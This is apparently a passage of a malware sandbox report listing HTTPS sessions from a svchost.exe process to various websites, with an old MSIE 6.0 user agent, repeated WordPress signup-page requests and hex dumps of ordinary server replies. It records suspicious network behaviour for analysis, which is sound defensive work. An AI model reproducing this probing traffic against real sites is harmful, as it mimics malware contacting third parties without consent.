                                                                                                                                                                                                                                                  2023-07-27 19:53:58 UTC1549INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  2192.168.2.45015794.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC74OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: diamir.de
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC75INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:35 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 162
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Location: https://www.diamir.de/
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                  2023-07-27 19:53:35 UTC75INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  20192.168.2.45773875.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:58 UTC1549OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: ldh.la.gov
                                                                                                                                                                                                                                                  2023-07-27 19:53:58 UTC1549INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:58 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 1346
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                  2023-07-27 19:53:58 UTC1550INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  21192.168.2.45401683.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:59 UTC1551OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: dataform.co.uk
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=2, max=99
                                                                                                                                                                                                                                                  Content-Length: 49180
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                  X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:00 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1569INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1573INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                  Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1581INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                  Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1589INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                  Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1597INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                  Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1605INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                  Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1645INData Raw: 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a
                                                                                                                                                                                                                                                  Data Ascii: https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  22192.168.2.459014172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:59 UTC1551OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: hyab.com
                                                                                                                                                                                                                                                  2023-07-27 19:53:59 UTC1551INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:59 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=85d5efdd0e6699b5154e779d05713eb1; path=/
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XscvW%2F1quD05P4iKpmHaRFc6gFc3dKdU%2FKLdNpVHU3z1tFl8X10dlIAI0QckO9FLhWreduFZQMUO9PkQHcj9ZyMiPVY90DjjSbU%2FZYOmRRqXytmoDhAVi5ErOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76e83dd4e18af-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:53:59 UTC1552INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  23192.168.2.45920583.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:00 UTC1552OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: dataform.co.uk
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1685INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=2, max=95
                                                                                                                                                                                                                                                  Content-Length: 49180
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                  X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:02 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1685INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1689INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                  Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1697INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                  Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
